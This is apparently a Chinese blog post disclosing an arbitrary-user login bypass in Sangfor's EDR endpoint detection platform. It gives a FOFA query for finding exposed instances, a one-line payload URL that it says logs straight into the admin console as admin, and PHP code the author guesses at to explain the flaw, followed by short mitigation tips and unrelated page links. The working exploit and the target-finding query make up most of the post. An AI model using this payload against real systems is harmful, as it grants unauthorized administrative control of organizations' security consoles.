非法操作 login.php,【最新重磅】深信服 EDR终端检测响应平台-任意用户免密登录漏洞...

最新推荐文章于 2023-10-07 21:22:31 发布
最新推荐文章于 2023-10-07 21:22:31 发布
阅读量377 收藏 1
点赞数
文章标签: 非法操作 login.php

注:本文仅供学习使用,请勿用于非法操作,后果与作者无关!

0x01 介绍

深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。

0x02 fofa:

title=“SANGFOR终端检测响应平台”

e24a78f685484a006e347c8054124d0f.png

0x03 payload:

https://ip/ui/login.php?user=admin

回车直接进入管理后台!!!

a680c6461fef2f01f7340374c10cadf9.png

0x04 测试图:

f1995c49c23ce17afa3948054a000eb9.png

0x05 猜测代码:

以下代码是根据其最近HW队爆出RCE漏洞代码及本次任意用户登录漏洞逻辑推断(可以看我的另一篇博客深信服RCE漏洞)。

if((isset($_SERVER["REMOTE_ADDR"]) && ("127.0.0.2" == $_SERVER["REMOTE_ADDR"] || "127.0.0.1" == $_SERVER["REMOTE_ADDR"]))

|| $docker)

{

//构造session

if(isset($_GET["user"]))

{

$auth_value["auth_user"] = $_GET["user"];

}

elseif($docker)

{

$auth_value["auth_user"] = $username;

}

else

{

//$auth_value["auth_user"] = "SCLOUDE";

//免密登录后,人为loginout,还是需要密码登录,url不一样

return;

}

在if判断中,首先判断了$_SERVER[“REMOTE_ADDR”]是否存在且为127.0.0.2

然后判断了是否等于127.0.0.1 以及$docker

因为exp执行可跳转进入后台,这里判断为真,我们搜索127.0.0.0和127.0.0.1进行定位

6b092a9c333350feb43216d4c84e16e1.png

搜索到127.0.0.1并定位到c.php , 这好像是之前命令执行RCE的文件

也就是说在这里开发不仅仅出现了变量覆盖漏洞,同时在这里默认定义了所属IP为127.0.0.1

由命令执行RCE同时触发了任意用户登陆漏洞

0x05 建议:

1、做好代码审查,又又又遇到extract()函数重写变量的问题;

2、我怎么就这么轻松进入管理平台了呢?EDR管理平台访问ip做ACL限制。

3、代码给我看傻了,提不了别的意见,我不配~

注:本文仅供学习使用,请勿用于非法操作,后果与作者无关!

yangyang0508
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
深信服EDR任意用户登录
nnn2188185的博客
03-17 543
深信服终端监测响应平台EDR)存在任意用户登录漏洞。攻击者可通过构造HTTP请求来利用此漏洞,成功利用此漏洞的攻击者可以未授权访问平台后台。
微信小程序-bug- 调用wx.login()无响应的原因和解决方案
03-29
想必,最近有些小程序开发者,在调用wx.login()的时候,在部分IOS上无响应的情况;  补充一点:在测试模式,调试模式,都是OK的,一上正式环境就GG了,百思不得其解啊! 响应结果如下:  分析结果,我们知道,...
非法操作 login.php,阅文游戏中心 h5游戏接入wiki
weixin_33651906的博客
04-01 709
阅文游戏中心《h5游戏 CP接口规范》接口要求规范游戏方接口说明:游戏方需按照规范提供,阅文进行调用阅文接口说明:阅文提供,游戏方调用参数 time 为Unix 时间戳(January 1 1970 00:00:00 GMT 起的秒数) ,单位为秒编码统一使用 UTF-8接口请求方式为 GET参数sign里的md5 加密要把md5后的字符串转成小写key双方协定或是一方处理完知会另一方php中.号...
非法操作 login.php,php(5) - 无涯学生的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_42152298的博客
04-01 139
cookie用法,获取输入之后再进行保存在客户端,提供给之后的页面login.phpif ($_GET['action']=='login') {if($_POST['name']=='admin'&& $_POST['pwd']==123456){setcookie('userName',$_POST['name'],time()+3600*24);header('Locatio...
login.php入侵,Glossword 'login.php' SQL 注入漏洞
weixin_36391973的博客
04-12 513
发布日期:2013-02-05更新日期:2013-02-27受影响系统:sourceforge glossword 1.8.3描述:--------------------------------------------------------------------------------BUGTRAQ ID: 57732Glossword是创建和发布在线多语言字典、词汇或百科全书的系统。Gl...
php-login-user-manage.zip_/manage/login.php_Free!_acconte_php lo
09-21
【标题】"php-login-user-manage.zip_/manage/login.php_Free!_acconte_php lo" 提供的信息表明,这是一个关于PHP用户管理系统登录部分的源代码压缩包。它可能包含了一个用于处理用户登录功能的PHP脚本,名为`login....
jsp-login.zip_jsp login_jsp 登录_jsp 登陆_login_simplelogin.jsp
09-20
【标题】"jsp-login.zip_jsp login_jsp 登录_jsp 登陆_login_simplelogin.jsp" 涉及的核心内容是一个基于JSP(JavaServer Pages)技术的简单登录系统。这个项目旨在帮助初学者理解JSP如何处理用户输入,验证身份,并...
微信小程序获取循环元素id以及wx.login登录操作
08-29
同时,wx.login登录操作是小程序中用户登录的主要方式,通过该操作可以获取用户的openid等私密信息。 获取循环元素id的方法是通过在wxml文件中使用wx:for指令,并在js文件中使用catchtap事件获取当前点击的元素id。...
jsp-login.rar_jsp servlet login _login_login java_login servlet_
09-23
【标题】"jsp-login.rar_jsp servlet login _login_login java_login servlet_" 提供的信息表明,这是一个关于使用JSP和Servlet实现登录功能的源代码压缩包。JSP(JavaServer Pages)是Java EE平台中用于创建动态...
open_basedir restriction in effect,解决php引入文件权限问题 解决方法
weixin_30246221的博客
06-28 674
如下: Warning: require(): open_basedir restriction in effect. File(/www/wwwroot/zhuyuyun/thinkphp/start.php) is not within the allowed path(s): (/www/wwwroot/zhuyuyun/public/:/tmp/:/proc/) ...
Warning: require(): open_basedir restriction in effect. File(/www/wwwroot/svnrepos/thinkphp/base.php
qq_24100549的博客
12-07 2681
Warning: require(): open_basedir restriction in effect. File(/www/wwwroot/svnrepos/thinkphp/base.php) is not within the allowed path(s): (/www/wwwroot/svnrepos/public/:/tmp/:/proc/) in /www/wwwroot/svnrepos/public/index.php on line 16 Warning: require(/www
宝塔Linux面板-Nigx-使用phpMyAdmin报错
gfhj778的博客
03-23 3694
报错1 no input file什么的 报错2 File(/tmp) is not within the allowed path(s): (/www/wwwroot:/www/server/phpmyadmin) 解决办法: 在www/server/nginx/conf/fastcgi.conf下最后一行添加 fastcgi_param PHP_ADMIN_VALUE “open_basedir=/www/wwwroot:/tmp/:/www/server/phpmyadmin”; 看不懂?其实
非法操作 login.php,Kordil EDMS v2.2.60rc3 'Password'参数SQL注入漏洞
weixin_42355665的博客
04-01 94
发布日期:2012-12-05更新日期:2012-12-07受影响系统:sourceforge Kordil EDMS 2.2.60rc3描述:--------------------------------------------------------------------------------BUGTRAQ ID: 56823Kordil EDMS是文档控制和管理系统。Kordil E...
Goby 漏洞发布|深信服下一代防火墙 loadfile.php 文件读取漏洞
最新发布
m0_46699477的博客
10-07 887
深信服下一代防火墙是一款以应用安全需求出发而设计的下一代应用防火墙。深信服下一代防火墙在 loadfile.php 处存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
login.php 代码,php中的登陆login实例代码,phplogin实例代码_PHP教程
weixin_39759270的博客
03-18 1662
php中的登陆login实例代码,phplogin实例代码本文实例为大家分享了php中的登陆login具体实现代码,供大家参考,具体内容如下exec_SQL($SQL);$total=mysql_num_rows($result);if($total==0){DBClose();Go_Msg("注册用户还没有通过管理员审核或用户名及密码不符!请重新输入!","../default.html");e...
ThinkPHP非法操作”的处理方法
热门推荐
良玉的博客
04-22 2万+
ThinkPHP 对“非法操作”的提示信息还是不足够的清晰,让人很难快速的定位是哪里出了错。   对ThinkPHP的程序做下简单分析,跟踪“非法操作”。   在文件 \ThinkPHP\Lang\zh-cn.php 找到下边的定义,你可以在这里修改提示信息。    '_ERROR_ACTION_'=>      '非法操作',     再跟踪
报错:非法操作index
Wake_me_Up123的博客
12-19 4740
解决方法:在Application/Home/Index/Controller/IndexController.class.php 配置文件中加入方法,如下:public function index(){ $this->assign('ROOT',$this->ROOT); $this->display(); }
php设计一个登录页面index.html,基于login.php
06-09
好的,我可以帮你设计一个登录页面index.html,基于login.php。 首先,我们需要在index.html页面中添加一个表单,以便用户输入用户名和密码。表单的代码如下: ```html <!DOCTYPE html> <title>Login Page ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值